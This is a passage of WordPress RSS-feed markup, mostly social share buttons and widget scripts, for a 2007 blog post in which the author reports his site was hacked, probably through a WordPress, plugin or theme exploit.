href="http://digg.com/submit?phase=2&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;bodytext=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li><a title="Tumblr" class="option1_16" style="background-position:-128px -16px" rel="nofollow" target="_blank" href="http://www.tumblr.com/share?v=3&amp;u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source&amp;s=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li><a title="BlinkList" class="option1_16" style="background-position:0px 0px" rel="nofollow" target="_blank" href="http://www.blinklist.com/index.php?Action=Blink/addblink.php&amp;Url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;Title=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="Google Reader" class="option1_16" style="background-position:-112px 0px" rel="nofollow" target="_blank" href="http://www.google.com/reader/link?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;srcURL=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;srcTitle=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse"></a></li><li><a title="StumbleUpon" class="option1_16" style="background-position:-112px -16px" rel="nofollow" target="_blank" href="http://www.stumbleupon.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&title=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="Myspace" class="option1_16" style="background-position:0px -16px" rel="nofollow" target="_blank" href="http://www.myspace.com/Modules/PostTo/Pages/?u=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;t=I%20was%20hacked%2C%20thank%20open%20source"></a></li><li><a title="Sphinn" class="option1_16" style="background-position:-96px -16px" rel="nofollow" target="_blank" href="http://sphinn.com/index.php?c=post&amp;m=submit&amp;link=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F"></a></li><li><a class="option1_16" style="cursor:pointer;background-position:-64px 0px" rel="nofollow" title="Add to favorites - doesn't work in Chrome"  onClick="javascript:AddToFavorites();"></a></li><li><a title="Posterous" class="option1_16" style="background-position:-32px -16px" rel="nofollow" target="_blank" href="http://posterous.com/share?linkto=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;selection=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li></ul><div onMouseout="fixOnMouseOut(this,event,'post-96')" id="sociable-post-96" style="display:none;"><div style="top: auto; left: auto; display: block;" id="sociable"><div class="popup"><div class="content"><ul><li style="heigth:16px;width:16px"><a title="Twitter" class="option1_16" style="background-position:-144px -16px" rel="nofollow" target="_blank" href="http://twitter.com/intent/tweet?text=I%20was%20hacked%2C%20thank%20open%20source%20-%20http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F%20(via%20@sociablesite)"></a></li><li style="heigth:16px;width:16px"><a title="LinkedIn" class="option1_16" style="background-position:-144px 0px" rel="nofollow" target="_blank" href="http://www.linkedin.com/shareArticle?mini=true&amp;url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;source=Alexander+Holbreich+Everything+becomes+a+little+different+as+soon+as+it+is+spoken+out+loud.++%7EHermann+Hesse&amp;summary=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li style="heigth:16px;width:16px"><a title="Delicious" class="option1_16" style="background-position:-16px 0px" rel="nofollow" target="_blank" href="http://delicious.com/post?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;notes=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li style="heigth:16px;width:16px"><a title="Google Bookmarks" class="option1_16" style="background-position:-96px 0px" rel="nofollow" target="_blank" href="http://www.google.com/bookmarks/mark?op=edit&amp;bkmk=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source&amp;annotation=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li style="heigth:16px;width:16px"><a title="MSNReporter" class="option1_16" style="background-position:-176px 0px" rel="nofollow" target="_blank" href="http://reporter.es.msn.com/?fn=contribute&amp;Title=I%20was%20hacked%2C%20thank%20open%20source&amp;URL=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;cat_id=6&amp;tag_id=31&amp;Remark=Maybe%20you%20notice%20the%20downtime%20of%20this%20site%20last%20days.%20Unfortunately%20it%20was%20hacked%20by%20someone%20for%20unknown%20purpose.%20The%20attackers%20uses%20some%20exploit%20in%20wordpress%20or%20some%20plug%20in%20or%20maybe%20of%20k2%20theme.%20Some%20malfunction%20of%20these%20open%20source%20components%20was%20"></a></li><li style="heigth:16px;width:16px"><a title="email" class="option1_16" style="background-position:-80px 0px" rel="nofollow" target="_blank" href="https://mail.google.com/mail/?view=cm&fs=1&to&su=I%20was%20hacked%2C%20thank%20open%20source&body=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&ui=2&tf=1&shva=1"></a></li><li style="heigth:16px;width:16px"><a style="cursor:poainter" rel="nofollow"   onMouseOver="more(this,'post-96')"><img src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/option1/16/more.png?4c9b33" title="Posterous" alt="Posterous" /></a></li></ul></div> <a style="cursor:pointer" onclick="hide_sociable('post-96',true)" class="close"> <img onclick="hide_sociable('post-96',true)" title="close" src="http://alexander.holbreich.org/wp-content/plugins/sociable/images/closelabel.png?4c9b33"> </a></div></div></div></div><div class='sociable' style='float:none'><ul class='clearfix'><li id="Twitter_Counter"><a href="https://twitter.com/share" data-text="I was hacked, thank open source - http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/ (via #sociablesite)" data-url="http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/" class="twitter-share-button" data-count="horizontal">Tweet</a><script type="text/javascript" src="//platform.twitter.com/widgets.js?4c9b33"></script></li><li id="Google_p"><g:plusone annotation="bubble" href="http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/" size="medium"></g:plusone></li><li id="Digg_Counter"><script type='text/javascript'>(function(){var s=document.createElement('SCRIPT'),s1=document.getElementsByTagName('SCRIPT')[0];s.type='text/javascript';s.async=true;s.src='http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s,s1);})();</script><a href='http://digg.com/submit?url=http%3A%2F%2Falexander.holbreich.org%2F2007%2F07%2Fi-was-hacked-thank-open-source%2F&amp;title=I%20was%20hacked%2C%20thank%20open%20source'  class='DiggThisButton DiggCompact'></a></li><li id="StumbleUpon_Counter"><script src="http://www.stumbleupon.com/hostedbadge.php?s=2&r=http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/"></script></li><li id="Facebook_Counter"><iframe src="//www.facebook.com/plugins/like.php?href=http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/&send=false&layout=button_count&show_faces=false&action=like&colorscheme=light&font" scrolling="no" frameborder="0" style="border:none; overflow:hidden;height:32px;width:100px" allowTransparency="true"></iframe></li><li id="LinkedIn_Counter"><script src="http://platform.linkedin.com/in.js" type="text/javascript"></script><script type="IN/Share" data-url="http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/" data-counter="right"></script></li></ul></div>]]></content:encoded> <wfw:commentRss>http://alexander.holbreich.org/2007/07/i-was-hacked-thank-open-source/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 1/19 queries in 0.018 seconds using disk: basic
Object Caching 664/699 objects using disk: basic

Served from: alexander.holbreich.org @ 2012-02-04 20:04:58 -->
